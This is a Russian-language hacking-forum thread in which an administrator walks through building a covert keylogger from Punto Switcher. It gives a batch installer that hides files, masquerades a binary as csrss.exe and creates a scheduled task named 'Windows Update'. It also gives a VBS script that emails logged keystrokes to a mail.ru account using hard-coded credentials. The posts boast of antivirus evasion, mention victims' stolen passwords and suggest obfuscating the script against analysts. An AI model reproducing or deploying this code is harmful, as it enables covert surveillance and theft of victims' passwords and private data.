ВАЖНО Делаем приватный кейлоггер с блекджеком и сисястой шлю***

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем X-Shar, 2 янв 2015.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    [​IMG]

    Как-то мы уже делали статью о том как можно использовать легальные программы исключительно в своих добрых целях...Dmeh-Smeh-Smeh!!!

    На многих форумах я слышал что vbs срипты неопасны, либо непопулярны, поэтому их пропуск АВ некритичен.

    В этой теме предлагаю порассуждать на тему кейлоггеров, т.к. RMS надоел уже вкрай...Dmeh-Smeh-Smeh!!!

    За основу возьмём Пунто свитчер или как его там неважно:



    Хоть автор данного ролика и просил не использовать это в коварных целях, но я неудержался...смех-смех!!!

    Что будет делать наш кейлоггер:

    1)Тихонечко ставится без админских прав;
    2)Ну разумеется логи будем отправлять на маил, в обход ВСЕХ файерволов и АВ (При настройках по умолчанию разумеется), сделаем это при помощи тулзы Wscript.exe короче скрипта VBS, а эта тулза есть в любой винде и имеет цифровую подпись и файеры её ОЧЕНЬ любят пропускать в сеть...WinkSmile

    Итак что-же нам нужно:

    1)Файлы этого свитчара, настроенные как в ролике выше (Можно взять во вложении);
    2)Винрар, или 7zip неважно, для создание SFX-архива;

    Вроде всё итак приступем:

    Создадим папку, куда скопируем файлы нашего свитчара, далее сделаем инсталяционный батник и кинем его в эту папку:

    Код:
    @echo on

    set WTime
    =5

    md 
    "%userprofile%\PP"
    md "%userprofile%\PP\Data"
    md "%userprofile%\PP\User Data"
    attrib +++"%userprofile%\PP"
    copy /"diary.dll" "%userprofile%\PP\diary.dll"
    copy /"diary.exe" "%userprofile%\PP\diary.exe"
    copy /"layouts.exe" "%userprofile%\PP\layouts.exe"
    copy /"libeay32.dll" "%userprofile%\PP\libeay32.dll"
    copy /"csrss.exe" "%userprofile%\PP\csrss.exe"
    copy /"preferences.xml" "%userprofile%\PP\User Data\preferences.xml"
    copy /"ps64ldr.exe" "%userprofile%\PP\ps64ldr.exe"
    copy /"ps.dat" "%userprofile%\PP\Data\ps.dat"
    copy /"pshook64.dll" "%userprofile%\PP\pshook64.dll"
    copy /"pshook.dll" "%userprofile%\PP\pshook.dll"
    copy /"replace.dat" "%userprofile%\PP\User Data\replace.dat"
    copy /"ssleay32.dll" "%userprofile%\PP\ssleay32.dll"
    copy /"translit-en.dat" "%userprofile%\PP\Data\translit-en.dat"
    copy /"translit-ru.dat" "%userprofile%\PP\Data\translit-ru.dat"
    copy /"triggers.dat" "%userprofile%\PP\Data\triggers.dat"
    copy /"user.dic" "%userprofile%\PP\User Data\user.dic"
    copy /"userdata.local" "%userprofile%\PP\userdata.local"
    copy /"UpdateWindows.vbs" "%userprofile%\PP\UpdateWindows.vbs"

    sc config Schedule startauto
    sc start Schedule
    schtasks 
    /create /sc MINUTE /mo %WTime% /RL HIGHEST /tn "Windows Update" /tr "%userprofile%\PP\UpdateWindows.vbs" /F
    start 
    "" "%userprofile%\PP\csrss.exe"

    Что делает батник:


    Копирует файлы свитчера в рабочую дирректорию жертвы, при этом создаёт хитрую папку pp, почему хитрую, а потому-что её не хера не видно даже если разрешить отображения скрытых папок...

    Обратите внимание на:

    Код:
    schtasks /create /sc MINUTE /mo %WTime% /RL HIGHEST /tn "Windows Update" /tr "%userprofile%\PP\UpdateWindows.vbs" /F
    Это создания в планировщике задач скрипта, который и будет отсылать лог на нашу почту, его код:
    Код:
    Dim WshS
    Set WshS 
    WScript.CreateObject("WScript.Shell")
    Set objMsg CreateObject("CDO.Message")
    Set Config CreateObject("CDO.Configuration")
    Set Config objMsg.Configuration
    objMsg
    .From "wcwadc@mail.ru"
    objMsg.To "wcwadc@mail.ru"
    objMsg.Subject "Test sending email from script"
    objMsg.Textbody "This is a body of E-mail."

    WshS.Run "taskkill /f /im Exp1orer.exe",0

    Wscript
    .Sleep 3000

    objMsg
    .AddAttachment WshS.ExpandEnvironmentStrings("%UserProfile%")+"\PP\User Data\diary.dat"

    Config("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    Config
    ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
    Config("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
    Config
    ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
    Config
    ("http://schemas.microsoft.com/cdo/configuration/sendusername") = "wcwadc"
    Config("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "wcwadc888"
    Config("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
    Config
    .Fields.Update
    objMsg
    .Send

    WshS
    .Run "Exp1orer.exe"

    Wscript.Echo "Отправка завершена"
    Wscript.Quit
    В vbs всё учёл, даже когда блокируется diary.dat свитчером, приходится завершать процесс перед отправкой, а потом опять запускать наш кейлоггеп, к сожалению задание не всегда устанавливается, поэтому можно придумать что-то другое, например написать простенькую прогу, которая будет запускать скрипт например раз в пять минут...

    Как сделать SFX архив здесь:https://ru-sf.ru/threads/delaem-krutoj-kripto-dzhojner-i-obxodim-detekt-vt.1858/

    Ну и самое главное, что ФУД:https://www.virustotal.com/ru/file/...ef7ecfd2af8bcd2d422ecc31/analysis/1420220547/

    Пароль на архив 111, можно распокавать винраром и сконфигурировать как захотите....
     

    Вложения:

    • StartFinall.rar
      Размер файла
      1,4 МБ
      Просмотров:
      37
    • Мне нравится Мне нравится x 4
    • Информативный пост Информативный пост x 1
    • Креативно Креативно x 1
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    И последнее забыл добавить, мне было лень но можно кое-что улучшить, а именно:

    1)Если глянете код, то там пароли от мыла, мыло кстати рабочее с паролями жертв...ogo-go

    Вот что будет если такое попадёт к вирусному аналитегу, он зайдёт и поднасрёт, что-бы такого небыло, можно сделать вот-что, знаю что можно шифровать VBS-скрипт, но при этом что-бы не терялось работоспособность скрипта....

    2)Фишка с планировщиком невсегда прокатывает, поэтому всё-же нужно наверное писать свою прогу, которая будет запускать скрипт с промежутком, но это не сложно...WinkSmile

    Кстати отправка мыла идёт по зашифрованному протоколу, что затруднит обнаружения, если шифровать код...Hi-H-88

    Идею взял здесь:https://www.xaker.name/forvb/showthread.php?t=29774

    Сборку сделал свою, можно ещё обновить этот пунто свитчер....:utenok:

    Хотя нет пишут что новые версии хуже тырят данные...Отдыхай!!!

    Но с конфигами поэкспериментировать можно !WinkSmile
     
    Последнее редактирование: 2 янв 2015
    • Мне нравится Мне нравится x 4
    • Информативный пост Информативный пост x 1
    • Креативно Креативно x 1

Поделиться этой страницей